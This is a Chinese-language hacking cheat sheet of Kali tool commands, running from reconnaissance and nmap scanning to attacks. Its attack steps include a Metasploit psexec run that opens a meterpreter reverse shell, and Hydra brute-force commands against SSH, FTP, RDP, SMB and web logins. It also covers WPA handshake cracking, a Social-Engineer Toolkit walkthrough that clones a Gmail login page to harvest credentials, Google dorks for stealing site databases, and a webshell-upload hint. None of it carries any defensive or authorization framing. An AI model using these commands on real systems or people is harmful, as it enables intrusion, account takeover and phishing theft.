信息收集:
dns信息收集
格式:dns... -参数 域名 -参数
示例:
root@xxSec:~# dnsenum baidu.com
root@xxSec:~# dnsenum -f dns.txt dnsserver 8.8.8.8 baidu.com(-f加字典暴力破解 通过代理服务器)
root@xxSec:~# dnswalk baidu.com.(检测有问题的dns,域名后面要加.结束)
root@xxSec:~# dnstracer -s 8.8.8.8 baidu.com -o(-o显示详细解析过程)
lbd 和 maltago信息收集(lbd是检测有没有做负载均衡)
lbd:
格式:ldb 域名
示例:
root@xxSec:~# lbd baidu,com
maltago:
maltago为图形界面,信息收集非常强大
traceroute 和 tcptraceroute这个一般不会被拦截(路由追踪)
格式:traceroute 域名
示例:
root@xxSec:~# traceroute www.baidu.com
root@xxSec:~# tcptraceroute www.baidu.com
nmap(扫描工具)
格式:nmap -参数 域名(ip)
Nmap常用参数
-sT TCP connect()扫描,这种方式会在目标主机的日志中记录大批连接请求和错误信息。
-sS 半开扫描,很少有系统能把它记入系统日志。不过,需要Root权限。
-sF -sN 秘密FIN数据包扫描、Xmas Tree、Null扫描模式
-sP ping扫描,Nmap在扫描端口时,默认都会使用ping扫描,只有主机存活,Nmap才会继续扫描。
-sU UDP扫描,但UDP扫描是不可靠的
-sA 这项高级的扫描方法通常用来穿过防火墙的规则集
-sV 探测端口服务版本
-Pn 扫描之前不需要用ping命令,有些防火墙禁止ping命令。可以使用此选项进行扫描
-v 显示扫描过程,推荐使用
-h 帮助选项,是最清楚的帮助文档
-p 指定端口,如“1-65535、1433、135、22、80”等
-O 启用远程操作系统检测,存在误报
-A 全面系统检测、启用脚本检测、扫描等
-oN/-oX/-oG 将报告写入文件,分别是正常、XML、grepable 三种格式
-T4 针对TCP端口禁止动态扫描延迟超过10ms
-iL 读取主机列表,例如,“-iL C:\ip.txt”
示例:
扫描指定IP所开放的端口:nmap -sS -p 1-65535 -v XXX.XXX.XXX.XXX
扫描C段存活主机:nmap -sP XXX.XXX.XXX.XXX/24
指定端口扫描:nmap -p 80,1433,22,1521 XXX.XXX.XXX.XXX
探测主机操作系统:nmap -o XXX.XXX.XXX.XXX
全面的系统探测:nmap -v -A XXX.XXX.XXX.XXX(Nmap默认扫描主机1000个高危端口)
探测指定网段:nmap XXX.XXX.XXX.XXX-XXX
穿透防火墙进行扫描:nmap -Pn -A XXX.XXX.XXX.XXX(XXX.XXX.XXX.XXX禁止用ping的)
使用脚本,扫描Web敏感目录:nmap -p 80 --script=http-enum.nse XXX.XXX.XXX.XXX
tcpdump 和 wireshark(抓包,协议分析工具)
tcpdump:
格式:tcpdump [选项] [过滤条件]
常见监控选项
-i:指定监控的网络接口
-A:转换为ACSⅡ码,以方便阅读
-w:将数据包信息保存到指定文件
-r:从指定文件读取数据包信息
过滤条件
类型:host,net,port,porteange
方向:src,dst
协议:tcp,udp,ip,wlan,arp
组合:and,or,not
示例:
root@xxSec:~# tcpdump -A -w /tmp/mail.cap tcp port 110(抓取tcp协议上端口110的包,保存到tmp下)
root@xxSec:~# tcpdump -r /tmp/mail.cap(读取抓包信息)
wireshark:
wireshark协议分析器, 一款网络协议分析软件,前身是著名的etherreal以太网分析器
snmpwalk
snmpwalk:
格式:snmpwalk -参数
–v 1|2c|3 指定SNMP协议版本
–V 显示当前SNMPWALK命令行版本
–r 指定重试次数,默认为0次。
–t 指定每次请求的等待超时时间,单为秒,默认为3秒。
–Cc 指定当在WALK时,如果发现OID负增长将是否继续WALK。
–c 指定共同体字符串
–l 指定安全级别:noAuthNoPriv|authNoPriv|authPriv
–u 安全名字
–a 验证协议:MD5|SHA。如果-l指定为authNoPriv或authPriv时才需要。
–A 验证字符串。如果-l指定为authNoPriv或authPriv时才需要。
–x 加密协议:DES。如果-l指定为authPriv时才需要。
–X 加密字符串:如果-l指定为authPriv时才需要。
示例:
root@xxSec:~# snmpwalk -c liompri 10.107.0.1 -v2c
sslscan(ssl密码劫持)
格式:sslscan 域名
示例:
root@xxSec:~# sslscan smtp.163.com
whatweb 和 wafw00f(whatweb:CMS类型、博客平台、中间件、web框架模块、网站服务器、脚本类型、JavaScript库、IP、cookie等等。wafw00f:检测有没有waf)
whatweb:
格式:whatweb 域名
示例: root@xxSec:~# whatweb baidu.com
wafw00f:
格式:wafw00f 域名
示例:root@xxSec:~# wafw00f baidu.com
漏洞评估:
web漏洞扫描工具:
skipfish
w3af(图形化操作)
burpsuite(图形化操作)
skipfish:
参数:
-I(i):只检查包含‘string’的URL(适用于大型网站)
-X:不检查包含‘string’的URL 如:logout
-K:不对指定参数进行fuzz测试
-D:跨站点爬另一个域(即目标页面中有另一个域名,则进行扫描)
-l:每秒最大请求数
-m:每IP最大并发连接数(依据带宽)
--config:指定配置文件(将参数命令写入一个配置文件)
-o 制定生成扫描报告文件夹
格式 :skipfish -参数 网址
示例:skipfish -o /home/xx http://www.baidu.com
攻击工具:
MSF-metasploit
格式:
root@xxSec:~# msfconsole 》选择攻击类型》选择模块》info 查看受影响版本》set 目标IP,set 目标端口,set 其他东西》根据漏洞类型选择返回会话》set 本机ip》show options查看信息》exploit
示例:
msf > use exploit/windows/smb/psexec(选择模块)
msf exploit(psexec) > set RHOST 192.168.1.1(目标主机)
RHOST => 192.168.1.1
msf exploit(psexec) > set RPORT 4445(目标端口)
RPORT => 4445
msf exploit(psexec) > set SMBuser administrtor(目标账户)
SMBuser => administrtor
msf exploit(psexec) > set SMBpass ceshi123(目标密码)
SMBpass => ceshi123
msf exploit(psexec) > set payload windows/meterpreter/reverse_tcp(选择返回会话)
payload => windows/meterpreter/reverse_tcp
msf exploit(psexec) > set LHOST 192.168.1.157(本机ip)
LhOST => 192.168.1.157
msf exploit(psexec) > exploit (开炮)
暴力破解:
hydra(九头蛇)
参数:
-R 继续从上一次进度接着破解
-S 大写,采用SSL链接
-s 小写,可通过这个参数指定非默认端口
-l 指定破解的用户,对特定用户破解
-L 指定用户名字典
-p 小写,指定密码破解,少用,一般是采用密码字典
-P 大写,指定密码字典
-e 可选选项,n:空密码试探,s:使用指定用户和密码试探
-C 使用冒号分割格式,例如“登录名:密码”来代替-L/-P参数
-M 指定目标列表文件一行一条
-o 指定结果输出文件
-f 在使用-M参数以后,找到第一对登录名或者密码的时候中止破解
-t 同时运行的线程数,默认为16
-w 设置最大超时的时间,单位秒,默认是30s
-v /-V显示详细过程
各协议的具体命令:
格式+示例:
1、破解ssh:
hydra -L 用户名字典 -p 密码字典 -t 线程 -vV -e ns ip ssh
hydra -l 用户名 -p 密码字典 -t 线程 -o save.log -vV ip ssh
2、破解ftp:
hydra ip ftp -L 用户名字典 -P 密码字典 -t 线程(默认16) -vV
hydra ip ftp -l 用户名 -P 密码字典 -e ns -vV
3、get方式提交,破解web登录:
hydra -L 用户名字典 -p 密码字典 -t 线程 -vV -e ns ip http-get/admin/
hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns -f ip http-get/admin/index.PHP
4、post方式提交,破解web登录:
hydra --L 用户名字典 -P 密码字典 -s 80 ip http-post-form"/admin/login.php:username=^USER^&password=^PASS^&submit=login:sorrypassword"
hydra -t 3 -l admin -P pass.txt -o out.txt -f 10.36.16.18 http-post-form"login.php:id=^USER^&passwd=^PASS^:<title>wrong username orpassword</title>"
参数说明:
-t同时线程数3,-l用户名是admin,字典pass.txt,保存为out.txt,-f 当破解了一个密码就停止,
10.36.16.18目标ip,http-post-form表示破解是采用http的post方式提交的表单密码破解,<title>中的内容是表示错误猜解的返回信息提示
5、破解https:
hydra -m /index.php -l muts -P pass.txt 10.36.16.18 https
6、破解teamspeak:
hydra -L 用户名字典 -P 密码字典 -s 端口号 -vV ip teamspeak
7、破解cisco:
hydra -P pass.txt 10.36.16.18 cisco
hydra -m cloud -P pass.txt 10.36.16.18 cisco-enable
8、破解smb:
hydra -L 用户名字典 -P pass.txt 10.36.16.18 smb
9、破解pop3:
hydra -l muts -P pass.txt my.pop3.mail pop3
10、破解rdp:
hydra ip rdp -l administrator -P pass.txt -V
11、破解http-proxy:
hydra -l admin -P pass.txt http-proxy://10.36.16.18
无线破解工具:
Aircrack-ng
参数:
BSSID:路由的MAC地址。
PWR:信号强度,越小信号越强。
Data:传输的数据,大的可能在看片了。
CH:信号频道,只有在一个频道才可进行下一步操作。
ESSID:wifi的名称,中文的会乱码。
示例:
root@xxSec:~# airmon-ng start wlan0(启动网卡监听模式)
root@xxSec:~# airodump-ng wlan0mon ?(airodump-ng网卡名 扫面周围wifi)
root@xxSec:~# airodump-ng -c -4 --bssid 8C:AB:8E:B6:3E:E1 -w /root/wlan0mon( c代表频道,要操作哪个无线就写哪个无线所在的频道,bssid是目标的mac地址,w将抓到的包要放的目录,wlan0mon是网卡名称)
root@xxSec:~# aircrack-ng -w /test/mima.lst /root-04.cap (w后跟你字典的地址,root-04.cap是握手包,根据你的名称写)
社会工程学;
SET--Social-Engineer Toolkit
示例:
set>
Select from the menu:
1) Social-Engineering Attacks (社会工程攻击)
2) Penetration Testing (Fast-Track) (渗透测试-快车道)
3) Third Party Modules (第三方模块)
4) Update the Social-Engineer Toolkit (更新社会工程师工具箱)
5) Update SET configuration (更新集配置)
6) Help, Credits, and About (帮助、学分和有关)
99) Exit the Social-Engineer Toolkit (退出社会工程师工具箱)
set> 1(选择社会工程攻击)
1) Spear-Phishing Attack Vectors --鱼叉式网络钓鱼攻击向量
2) Website Attack Vectors --网站攻击向量
3) Infectious Media Generator --传染媒介发生器
4) Create a Payload and Listener --创建有效负载和侦听器
5) Mass Mailer Attack --群发邮件攻击
6) Arduino-Based Attack Vector --基于Arduino的攻击向量
7) Wireless Access Point Attack Vector --无线接入点攻击矢量
8) QRCode Generator Attack Vector ---二维码生成器的攻击向量
9) Powershell Attack Vectors ----PowerShell攻击向量
10) SMS Spoofing Attack Vector ----短消息欺骗攻击矢量
11) Third Party Modules --- 第三方模块
99) Return back to the main menu.---返回主菜单。
set> 2(选择网站攻击向量)
1) Java Applet Attack Method java ---applet的攻击方法
2) Metasploit Browser Exploit Method ---Metasploit的浏览器漏洞的方法
3) Credential Harvester Attack Method ---凭据收割机攻击方法
4) Tabnabbing Attack Method ---tabnabbing攻击的方法
5) Web Jacking Attack Method ---web顶进攻击方法
6) Multi-Attack Web Method ---多攻击web方法
7) Full Screen Attack Method ----全屏攻击方法
8) HTA Attack Method ----HTA的攻击方法
set:webattack>3(选择凭据收割机攻击)
1) Web Templates Web模板
2) Site Cloner 网站的克隆
3) Custom Import 自定义导入
set:webattack>1(选择web模板)
。。。。。。。。。。。。。
set:webattack> IP address for the POST back in Harvester/Tabnabbing:192.168.230.174(写上本机ip)
1. Java Required
2. Google
3. Facebook
4. Twitter
5. Yahoo
set:webattack> Select a template:2(模仿gmail邮箱)
局域网攻击:
ettercap:(图形界面操作)
压力测试:
t50(路由压力测试)
mdk3(无线压力测试)
判断cms类型:
判断的目标——什么语言写的,什么操作系统,搭建平台。Cms厂商
使用什么工具判断——wvs,wwwscan,站长工具,whatweb,GoogleHack。
示例:
暴库:
就是通过一些技术手段或者程序漏洞得到数据库的地址,并将数据非法下载到本地。
暴库利用方法:
inurl:/inc/conn.asp inurl:/inc+conn.asp to parent directory intex:
inurl:/inc/conn.asp
inurl:/inc+conn.asp
高级语法暴库——
inurl:./..admin../..add..
inurl:./..admin../..del..
Inurl:./asp<id=<% <%< %
利用GoogleHack来搜索主要有——
Intile intext
inrul site
filetype等等
后台查找:
默认后台——admin,admin/login.asp, manage,login.asp
查看网站使用的管理系统,GoogleHack
用工具查找——wwwscan,intellitamper,御剑
robots.txt的帮助,robots文件告诉蜘蛛程序在服务器上什么样的文件被查看
查看网站使用的编辑器是否有默认后台密码
查看网页编辑器,社会工程等等
示例:
下面是演示站点(织梦的webshell是最好拿的,上传图片马就可以)
密码破解:
网站管理员密码猜解——
hydra
PKAV HTTP Fuzzer
Discuz批量用户密码暴力破解器
示例: